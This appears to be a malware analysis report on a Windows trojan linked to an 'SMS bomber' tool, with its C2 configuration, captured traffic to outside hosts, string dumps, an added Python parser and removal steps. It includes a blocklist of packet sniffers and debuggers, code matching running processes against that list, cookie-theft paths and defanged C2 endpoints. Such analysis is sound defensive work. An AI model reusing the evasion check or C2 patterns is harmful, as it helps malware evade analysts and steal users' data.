[s15]999999999[s15]
[s17]C:\Windows\System\background_image.jpg[s17]
[s19]hXXp://VVV.aaazha.com/page/study/teaManager.html[s19]
[F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA,C2,[F1]
[F2]d2VibWFzdGVyQEhLNzE4MDk=[F2]
[F3]dsll=207[F3]
[F4]/WEB/D_Jk/[F4]
[F5]/WEB/D_ym_Jk/[F5]
[F6]1[F6]
[F7]1[F7]
[F8]5[F8]
[s20]C:\Windows\System\get_local_datum.txt[s20]
[dlyc]40000[dlyc]
[fzbyc]30000[fzbyc]
[jcmc]AAA短信轰炸机[jcmc]
[sypost]3[sypost]
[xmlHttp_GetInfo]1[xmlHttp_GetInfo]
[xmlHttp_AddCode]1[xmlHttp_AddCode]
[GetFried]73[GetFried]
[upHelp]69[upHelp]
[back_url]hXXp://1.aaaverify.sinaapp.com/back.txt[back_url]
[skype_url]hXXp://VVV.aaazha.com/page/study/skype.html[skype_url]
[admin_url]hXXp://VVV.baidu.com[admin_url]
[s21]54,32,02,ED,D5,B5,3C,E8,30,84,76,C2,5E,F4,02,16,35,87,15,E6,B7,D6,CE,[s21]
[s22]hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime[s22]
[min]1120[min]
[max]1500[max]
[p=obs]A3,A9,[obs]
[p=obp]25,7A,57,[obp]
[strcd]15[strcd]
[strbs]gnb*[strbs]
[getCoot]15[getCoot]
[senKet]8*66[senKet]
[sz166]1500[sz166]
[sz52k]10000[sz52k]
[mmd88]76.com[mmd88]
[objokj]baidu.com[objokj]
[de3]720000[de3]
[addBase]14[addBase]
[http-s]image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

(This is a server-delivered configuration in a flat [tag]value[tag] format; the sandbox shows non-ASCII bytes as dots, and [jcmc] is restored above from its 15 dots, which match the UTF-8 length of the product name 短信轰炸机 searched for elsewhere in the trace. Fields worth noting: [s14] is a pipe-separated list of packet sniffers and HTTP debuggers (SmartSniff, Fiddler, Wireshark, Charles, WinSock Expert, Ethereal, HttpWatch, HTTP Analyzer, HTTP Debugger, HTTPLook, plus two names that did not survive the capture); a list like this is normally compared against running process or window names to detect analysis, so expect the sample to behave differently when those tools are visible. [s5] is the aaafz_now.asp endpoint polled above; [s22] is Tencent's QQ server-time CGI; [s6]=600000 and [de3]=720000 look like millisecond intervals, though the report does not confirm that. [F1] and [s21] are comma-separated hex byte lists (16 and 23 bytes); [F2] is base64 and decodes to webmaster@HK71809. [s1]/[s3] name registry keys under SOFTWARE and [s2], [b1], [s20], [s4], [s17] name files under %WinDir%\system and C:\Windows that do not appear in the file activity above, so they were either not reached in the sandbox run or are created on a later poll.)

<<< skipped >>>
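The configuration above is a flat sequence of [tag]value[tag] fields. The parser below is an added example (not the sandbox's or the sample's own code) that splits such a response into fields, decodes the comma-separated hex lists and the base64 [F2] value, and applies the [s14] tool list to a set of process names the way a sample would. SAMPLE_CONFIG is a constructed excerpt of the captured body using the page's values; the process names handed to flag_analysis_tools are assumed.

```python
"""Parser for the [tag]value[tag] configuration the sample fetches from
now_set.php. Added example, not the sandbox's or the sample's own code;
SAMPLE_CONFIG is a constructed excerpt of the captured response with
the values exactly as they appear in the report."""
import base64
import re

SAMPLE_CONFIG = (
    "[s1]SOFTWARE\\Now_warks\\[s1]"
    "[s2]%WinDir%\\system\\WINSPLEDX[s2]"
    "[s5]hXXp://56063.vhost18.boxcdn.cn/aaafz_now.asp[s5]"
    "[s6]600000[s6]"
    "[s14]SmartSniff|Fiddler|Wireshark|Charles|WinSock Expert|Ethereal|"
    "HttpWatch|HTTP Analyzer|HTTP Debugger|HTTPLook[s14]"
    "[F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA,C2,[F1]"
    "[F2]d2VibWFzdGVyQEhLNzE4MDk=[F2]"
    "[p=obs]A3,A9,[obs]"
    "[back_url]hXXp://1.aaaverify.sinaapp.com/back.txt[back_url]"
    "[http-s]image/gif, image/x-xbitmap"  # truncated field, as in the capture
)

OPEN_TAG_RE = re.compile(r"\[([^\[\]]+)\]")


def parse_config(blob):
    """Return {tag: value} for every [tag]value[tag] pair in blob.

    The capture also shows pairs written as [p=obs]...[obs]; those are
    accepted with the 'p=' prefix dropped from the key. An opening tag
    with no matching close (the truncated [http-s] field) is skipped."""
    fields = {}
    pos = 0
    while True:
        opening = OPEN_TAG_RE.search(blob, pos)
        if opening is None:
            return fields
        tag = opening.group(1)
        key = tag[2:] if tag.startswith("p=") else tag
        close = blob.find("[" + key + "]", opening.end())
        if close < 0:
            pos = opening.end()
            continue
        fields[key] = blob[opening.end():close]
        pos = close + len(key) + 2


def sniffer_blocklist(fields):
    """The analysis tools named in [s14], one entry per '|'."""
    return [name for name in fields.get("s14", "").split("|") if name]


def flag_analysis_tools(process_names, fields):
    """Process (or window) names matching a blocklist entry, case-insensitively.
    This is the comparison a sample would run against the list; run it over
    your own tool names to see which ones the config would notice."""
    wanted = [name.lower() for name in sniffer_blocklist(fields)]
    return [p for p in process_names if any(w in p.lower() for w in wanted)]


def hex_bytes(fields, key):
    """Decode a comma-separated hex list such as [F1] into bytes."""
    return bytes(int(h, 16) for h in fields[key].split(",") if h)


def decode_base64_field(fields, key):
    """Decode a base64 field such as [F2] and return it as text."""
    return base64.b64decode(fields[key]).decode("ascii")


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print(sniffer_blocklist(cfg))
    print(flag_analysis_tools(["explorer.exe", "Fiddler.exe", "wireshark-gtk"], cfg))
    print(decode_base64_field(cfg, "F2"))
    print(hex_bytes(cfg, "F1").hex())
```

The parser is deliberately tolerant: it scans for an opening bracket and then looks for the matching close, so a truncated trailing field or the odd [p=...] variant does not abort the whole parse, which matters when the response is cut off as it is in this capture.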

GET /music/url.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: aaafzcloud.duapp.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:22:45 GMT
Content-Type: text/plain
Content-Length: 119
Connection: keep-alive
ETag: "1831753481"
Accept-Ranges: bytes
Last-Modified: Fri, 08 Apr 2016 09:52:54 GMT
Set-Cookie: BAEID=C55117C1D377C73FC86310287F6FD72D; expires=Tue, 27-Jun-17 17:22:45 GMT; max-age=31536000; path=/; version=1
*|hXXp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f|*

(119-byte body: a single URL wrapped in *| |*, which the sample then requests and is refused with 401, as shown above)


GET /tool/get_date.php HTTP/1.1
Accept: */*
Referer: hXXp://1.musql.sinaapp.com/tool/get_date.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: 1.musql.sinaapp.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: sae
Date: Mon, 27 Jun 2016 17:22:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Via: 10.67.15.66
13
2016-06-28 01:22:44
0

(chunked body of 0x13 = 19 bytes: the server's clock, which the sample echoes back in the time= field of the now_set.php POST above)


The Trojan connects to the servers at the following location(s):

(see the URL table and the captured traffic above)

Strings from dumps

%original file name%.exe_464:

.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
exdui.dll
gdiplus.dll
kernel32.dll
GdiPlus.dll
Kernel32.dll
user32.dll
Ole32.dll
OleAut32.dll
User32.dll
ole32.dll
shlwapi.dll
advapi32.dll
wininet.dll
advpack.dll
Psapi.dll
ntdll.dll
Wininet.dll
Powrprof.dll
gdi32.dll
Gdi32.dll
shell32.dll
imm32.dll
dbghelp.dll
oleaut32.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ExitWindowsEx
EnumChildWindows
keybd_event
ShellExecuteA
InternetOpenUrlA
GetProcessHeap
SetThreadExecutionState
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
FtpCreateDirectoryA
FtpRemoveDirectoryA
FtpGetFileA
FtpFindFirstFileA
FtpSetCurrentDirectoryA
FtpGetCurrentDirectoryA
FtpDeleteFileA
FtpRenameFileA
FtpPutFileA
FtpOpenFileA
FtpGetFileSize
mg.LJ
AOC:\Windows\System\MemorandumList.txt
aaafz.ini
\aaafz.ini
_en.exe
cmd /c
MsgBox
SysShadow.SubWnd
@1970-01-01 08:00:00
function time(){return Math.random()}
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
1398346191
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
:15.0.0.0:80
:1.0.0.0:8
hXXp://56063.vhost18.boxcdn.cn/law.txt
hXXp://56063.vhost18.boxcdn.cn/Mess.asp
\host_ip.txt
:*.*.*.*:**
*.txt
|*.txt
application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
https
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
hXXps://
hXXp://
[1][0-9]{10}
hXXp://m.ip138.com/mobile.asp?mobile=
\Tencent\QQ\Misc\*.*
.com/Mail.php
hXXp://1.musql.
hXXp://1.musql.sinaapp.com/
@hXXp://1.musql.sinaapp.com/tool/get_date.php
hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime
hXXp://aaafzcloud.duapp.com/tool/time.php
hXXp://VVV.l-last.win/t.php
.com/best_house.php
&key=
open_url_lalala_w
[url]
&userKey=
hXXp://VVV.baidu.com/s?wd=
hXXp://1.musql.sinaapp.com/UserFriedManager.php
hXXps://VVV.baidu.com/s?wd=
hXXp://1.musql.sinaapp.com/synchronous/synchronous.php
\exdui.dll
C:\Windows\System\exdui.dll
Riched20.dll
Microsoft.XMLDOM
number is %d.
:"%s"
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
cmd /c attrib  s  a  h  r
hXXp://1.applis.sinaapp.com/sendEmail/SendIsNew.php
TStdHttpAnalyzerForm
%WinDir%\
C:\Windows\System\background_image_main.jpg
18,43,43,87,
54,11,24,
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")
GetTrait ="1:"&Obj.Caption&" 2:"&Obj.AdapterRAM&" 3:"&Obj.VideoProcessor
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")
GetTrait = "[t]"&Obj.InstallDate&"[t][s]"&round(Obj.TotalVisibleMemorySize/1024,0)&"MB[s]"
[ip_url_s]
.com/
hXXp://1.
115645421
13132132
!**[/]*?
[ipUrl]
[phone_num_url]
[ymzq_url]
hXXp://71809.vhost29.boxcdn.cn/TeaManager.html
hXXp://1.musql.sinaapp.com/tool/sendBug.php
&key_2=
sos=1&key_1=
hXXp://VVV.l-loan.loan
hXXp://VVV.l-last.win/
[xmlHttp_GetInfo]
hXXp://VVV.l-last.win/
[back_url]
[skype_url]
[admin_url]
[xmlHttp_AddCode]
[http-s]
[http-l]
[qiangz_url]
hXXp://aaafzcloud.duapp.com/music/url.txt
hXXp://aaafzcloud.duapp.com
.com/new_par/isonLine.php
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
hXXp://1.musql.sinaapp.com/user_string/add.php
hXXp://1.musql.sinaapp.com/user_string/get.php?u=
%f%%f
\historyRecord.txt
.IDATx
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_GetInfo.php
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_SetUserInfo.php
http:
%WinDir%\aaafz_begin.bat
hXXp://1.applis.sinaapp.com/UserHelper/xmlHttp_AddCode.php
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/reporterror.xml
crText
Report
themepassword
SysShadow.HostWnd
dwmapi.dll
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
PasswordChar
crTextSel
SysShadow.Menu
&password=
&softkey=
Content-Disposition: form-data; name="password"
{pass}
Content-Disposition: form-data; name="softkey"
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
Login
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Q%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
RPCRT4.dll
WinExec
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyExA
COMCTL32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
VVV.dywt.com.cn
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
window %s handle %d
play %s from %d
play %s
status %s position
close %s
Bag pipe
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
0123456789
The URL has moved <a href="hXXp://VVV.sogou.com/web?eqs=IqBxtK2GXBhObbOJnApGMSVJzHTu5YFkNp0pX4BY7raYoHO4Lmoxg6VkPt+lrAuy0EvntqalRd7pIIQoVH7sLA==&lkx=0">here</a>
*|hXXp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f|*
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
1.0.0.0
(*.*)
7.5.1.0

%original file name%.exe_464_rwx_00E20000_00013000:

.text
`.rdata
@.data
.rsrc
@.reloc
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
<fd:%d>
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
KERNEL32.dll
zlib1.dll
DLL support by Alessandro Iacopetti & Gilles Vollant

%original file name%.exe_464_rwx_10001000_0002C000:

Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
Microsoft.XMLDOM
advapi32.dll
kernel32.dll
ntdll.dll
user32.dll
gdi32.dll
ole32.dll
Ole32.dll
shell32.dll
atl.dll
GdiPlus.dll
GetProcessHeap
program internal error number is %d.
:"%s"
:"%s".
.text
`.rdata
@.data
.rsrc
.reloc
number is %d.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    attrib.exe:1888

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (791 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\exdui.dll (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (162 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (678 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (234 bytes)
    %WinDir%\system\exdui.dll (42 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (11952 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (2413 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (309 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
